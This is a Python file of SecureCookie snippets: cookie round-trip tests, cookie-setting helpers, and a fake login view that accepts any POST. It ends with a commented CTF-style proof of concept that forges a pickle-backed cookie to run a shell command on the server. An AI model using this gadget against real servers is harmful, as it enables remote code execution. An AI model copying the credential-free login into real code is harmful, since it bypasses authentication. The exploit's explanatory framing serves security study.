def test_basic_support():
    """Check SecureCookie state flags, round-tripping, and wrong-key handling."""
    # A freshly built cookie is "new" and has nothing worth persisting yet.
    cookie = SecureCookie(secret_key=b'foo')
    assert cookie.new
    assert not cookie.modified
    assert not cookie.should_save

    # The first write must flip the dirty flags.
    cookie['x'] = 42
    assert cookie.modified
    assert cookie.should_save

    # Same key: the payload comes back as a distinct, clean object.
    wire = cookie.serialize()
    restored = SecureCookie.unserialize(wire, b'foo')
    assert cookie is not restored
    assert not restored.new
    assert not restored.modified
    assert not restored.should_save
    assert restored == cookie

    # Wrong key: signature verification fails and the caller receives an
    # empty cookie instead of the stored data (no exception is raised).
    rejected = SecureCookie.unserialize(wire, b'wrong foo')
    assert not rejected.modified
    assert not rejected.new
    assert rejected == {}

    # A text (non-bytes) key must round-trip as well.
    seeded = SecureCookie({'x': 42}, 'foo')
    seeded_wire = seeded.serialize()
    assert SecureCookie.unserialize(seeded_wire, 'foo') == seeded
def test_basic_support():
    """Exercise creation, mutation, serialization and key mismatch of SecureCookie."""
    original = SecureCookie(secret_key=b"foo")
    # Nothing written yet: new, unmodified, no need to save.
    assert original.new
    assert not original.modified
    assert not original.should_save

    original["x"] = 42
    # One item assignment is enough to require a save.
    assert original.modified
    assert original.should_save

    blob = original.serialize()

    # Deserializing with the signing key gives an equal but separate cookie
    # whose flags are all reset.
    loaded = SecureCookie.unserialize(blob, b"foo")
    assert original is not loaded
    assert not loaded.new
    assert not loaded.modified
    assert not loaded.should_save
    assert loaded == original

    # Deserializing with a different key must not expose the payload: the
    # result compares equal to an empty dict.
    mismatched = SecureCookie.unserialize(blob, b"wrong foo")
    assert not mismatched.modified
    assert not mismatched.new
    assert mismatched == {}

    # Same round trip, this time with a str key and initial data.
    prefilled = SecureCookie({"x": 42}, "foo")
    prefilled_blob = prefilled.serialize()
    assert SecureCookie.unserialize(prefilled_blob, "foo") == prefilled
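def saveOAuthToken(next, token, secret, max_age=3000):
    """Build a response for *next* that carries the OAuth token pair in a cookie.

    Args:
        next: Value handed to ``make_response`` to build the response.
        token: OAuth token stored under the ``"token"`` key.
        secret: OAuth token secret stored under the ``"secret"`` key.
        max_age: Cookie lifetime in seconds, used to compute the expiry time.

    Returns:
        The response object with the ``zapfauth_token`` cookie set.
    """
    # NOTE(review): assuming this is Werkzeug's SecureCookie, the payload is
    # signed but NOT encrypted, so the token and its secret are readable by
    # anyone who obtains the cookie. Prefer keeping them server-side and
    # putting only an opaque reference in the cookie.
    signing_key = current_app.config['SECRET_KEY'].encode('utf-8')
    data = SecureCookie({"token": token, "secret": secret}, signing_key)
    expires = datetime.utcnow() + timedelta(seconds=max_age)
    resp = make_response(next)
    # HttpOnly keeps page scripts (e.g. injected via XSS) from reading the
    # OAuth credentials out of document.cookie.
    # NOTE(review): also pass secure=True once the site is HTTPS-only.
    resp.set_cookie('zapfauth_token', data.serialize(), expires=expires,
                    httponly=True)
    return resp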
def fake_login(request):
    """Stand-in login view: GET shows a placeholder, POST sets a logged-in cookie.

    Any other HTTP method falls through and yields ``None``.
    """
    method = request.method
    if method == 'GET':
        return Response("FAKE LOGIN", mimetype="text/html")
    if method != 'POST':
        return None

    # No credentials are checked here: every POST is treated as a successful
    # login and receives a signed ``session_data`` cookie.
    reply = Response("LOGGED IN", mimetype="text/html")
    signed_state = SecureCookie({"logged_in": True}, SECRET_KEY)
    reply.set_cookie('session_data', signed_state.serialize())
    return reply
def set_gaema_user(service, user):
    """Persist *user* for *service* in a signed cookie or the server session.

    The backend is chosen by ``settings.GAEMA_STORAGE``: the value ``"cookie"``
    selects the cookie path, anything else (or no setting) uses the session.
    """
    storage_key = GAEMA_USER_KEY_FORMAT % service
    cookie_backed = (
        hasattr(settings, "GAEMA_STORAGE") and settings.GAEMA_STORAGE == "cookie"
    )

    if not cookie_backed:
        from kay.sessions import renew_session
        # NOTE(review): presumably this issues a fresh session before the
        # identity is attached - confirm against kay.sessions.
        renew_session(local.request)
        local.request.session[storage_key] = user
        local.request.session.modified = True
        return

    # NOTE(review): the whole ``user`` mapping travels to the browser. If
    # SecureCookie is Werkzeug's, it is signed but not encrypted, so nothing
    # in it should be confidential.
    signed_user = SecureCookie(user, secret_key=settings.SECRET_KEY)
    set_cookie(storage_key, signed_user.serialize())
def set_to_cookie(req_response, cookie, key, value):
    """Store ``key = value`` inside the signed cookie named *cookie*.

    The cookie sent with the current request is reused when present; otherwise
    an empty one is created. The cookie name is also recorded in the session
    list kept under ``ALL_COOKIES_KEY``.
    """
    raw = request.cookies.get(cookie)
    # ``raw`` is client-controlled. Its integrity depends entirely on the
    # SECRET_KEY signature check performed inside unserialize().
    jar = (
        SecureCookie(secret_key=app.config["SECRET_KEY"])
        if raw is None
        else SecureCookie.unserialize(raw, app.config["SECRET_KEY"])
    )
    jar[key] = value

    tracked = session.get(ALL_COOKIES_KEY, [])
    if cookie not in tracked:
        tracked.append(cookie)
        # Reassign so that the session sees the change to the list.
        session[ALL_COOKIES_KEY] = tracked

    req_response.set_cookie(cookie, jar.serialize())
def post_process(self, environ, headers):
    """Append a ``Set-Cookie`` header reflecting the current login state.

    With a logged-in user, a signed cookie holding the user id and session
    token is issued. Without one, an existing cookie of this name is expired;
    if the request carried no such cookie, ``headers`` is left untouched.
    """
    current = User.get_current()
    if current:
        # NOTE(review): the session token is placed in the cookie payload. If
        # SecureCookie is Werkzeug's, that payload is signed but readable.
        payload = {
            'uid': current.id,
            'session_token': current.get_session_token(),
        }
        signed = SecureCookie(payload, self.secret)
        header_value = http.dump_cookie(
            self.name,
            signed.serialize(),
            expires=self.expires,
            max_age=self.max_age,
        )
        headers.append((utils.to_native('Set-Cookie'), header_value))
        return

    # Logged out: only send an expiry header when the client actually holds
    # the cookie.
    if self.name not in http.parse_cookie(environ):
        return
    expired = http.dump_cookie(self.name, '', expires=1)
    headers.append((utils.to_native('Set-Cookie'), expired))
def post_process(self, environ, headers):
    """Issue or expire the login cookie by appending to *headers*.

    A current user gets a signed cookie with ``uid`` and ``session_token``.
    No current user means a cookie of this name, if the request carried one,
    is overwritten with an empty, already-expired value.
    """
    account = User.get_current()

    if not account:
        presented = http.parse_cookie(environ)
        if self.name in presented:
            # Empty value plus expires=1 tells the browser to drop the cookie.
            clearing = http.dump_cookie(self.name, '', expires=1)
            headers.append(('Set-Cookie', clearing))
        return

    # NOTE(review): the session token rides in the cookie payload. If
    # SecureCookie is Werkzeug's, the payload is signed but not encrypted.
    contents = {
        'uid': account.id,
        'session_token': account.get_session_token(),
    }
    signed = SecureCookie(contents, self.secret)
    issued = http.dump_cookie(
        self.name,
        signed.serialize(),
        expires=self.expires,
        max_age=self.max_age,
    )
    headers.append(('Set-Cookie', issued))
def test_basic_support(self):
    """Verify SecureCookie flags, a keyed round trip, and wrong-key rejection."""
    # Fresh cookie: new, clean, nothing to save.
    cookie = SecureCookie(secret_key=b'foo')
    assert cookie.new
    assert not cookie.modified
    assert not cookie.should_save

    # Mutation marks it for saving.
    cookie['x'] = 42
    assert cookie.modified
    assert cookie.should_save

    # Correct key restores an equal, independent, unmodified cookie.
    wire = cookie.serialize()
    restored = SecureCookie.unserialize(wire, b'foo')
    assert cookie is not restored
    assert not restored.new
    assert not restored.modified
    assert not restored.should_save
    self.assert_equal(restored, cookie)

    # Wrong key yields an empty cookie rather than the signed contents.
    rejected = SecureCookie.unserialize(wire, b'wrong foo')
    assert not rejected.modified
    assert not rejected.new
    self.assert_equal(rejected, {})
def test_basic_support(self):
    """Cover the SecureCookie lifecycle: create, modify, serialize, reload."""
    source = SecureCookie(secret_key='foo')
    # Before any write the cookie reports new/clean.
    assert source.new
    assert not source.modified
    assert not source.should_save

    source['x'] = 42
    # After a write it must be flagged for persistence.
    assert source.modified
    assert source.should_save

    token = source.serialize()

    # Matching key: contents survive, flags are reset, object is distinct.
    reloaded = SecureCookie.unserialize(token, 'foo')
    assert source is not reloaded
    assert not reloaded.new
    assert not reloaded.modified
    assert not reloaded.should_save
    assert reloaded == source

    # Non-matching key: the signature does not verify and the result is
    # empty, so data signed under another key is never trusted.
    untrusted = SecureCookie.unserialize(token, 'wrong foo')
    assert not untrusted.modified
    assert not untrusted.new
    assert untrusted == {}
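def test_basic_support(self):
    """Check SecureCookie state flags, round-tripping, and wrong-key handling."""
    c = SecureCookie(secret_key="foo")
    # A new cookie has nothing to persist. The leftover debug ``print`` of
    # these flags was dropped: it only added noise to test output and, as a
    # Python 2 print statement, stopped the module importing on Python 3.
    assert c.new
    assert not c.modified
    assert not c.should_save

    # Any item assignment must mark the cookie for saving.
    c["x"] = 42
    assert c.modified
    assert c.should_save

    # Same key: an equal but separate cookie with all flags cleared.
    s = c.serialize()
    c2 = SecureCookie.unserialize(s, "foo")
    assert c is not c2
    assert not c2.new
    assert not c2.modified
    assert not c2.should_save
    assert c2 == c

    # Different key: verification fails and an empty cookie is returned
    # instead of the stored payload.
    c3 = SecureCookie.unserialize(s, "wrong foo")
    assert not c3.modified
    assert not c3.new
    assert c3 == {}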
# CTF-style proof of concept showing why a pickle-backed SecureCookie is only
# as safe as its signing key.
#
# Risk: werkzeug.contrib.securecookie.SecureCookie serializes values with
# pickle by default. The HMAC signature is the only thing standing between a
# client-supplied cookie and pickle deserialization on the server, so a
# leaked, guessable or hard-coded SECRET_KEY turns cookie forgery into code
# execution in the web worker.
#
# Mitigation: set ``serialization_method`` to json on a SecureCookie subclass
# (or move to a JSON-based signed-session library), generate the key from a
# CSPRNG, keep it out of source control, and rotate it after any exposure.
#
# Detection: a web worker spawning unexpected child processes, and session
# cookies whose decoded values are not plain data.
import os  # unused in this script
import subprocess
from werkzeug.contrib.securecookie import SecureCookie


class RCE(object):
    # pickle consults __reduce__ when serializing an instance and stores the
    # returned (callable, args) pair; loading the pickle invokes that callable.
    def __reduce__(self):
        return (subprocess.check_output, (['cat','flag.txt'],))


# The script works only because the application's signing key is known.
SECRET_KEY = 'superdupersecretflagonkey'
payload = {'name': RCE() , 'username': '******'}
x = SecureCookie(payload, SECRET_KEY)
# serialize() pickles each value and signs the result with SECRET_KEY.
value = x.serialize()
print(value)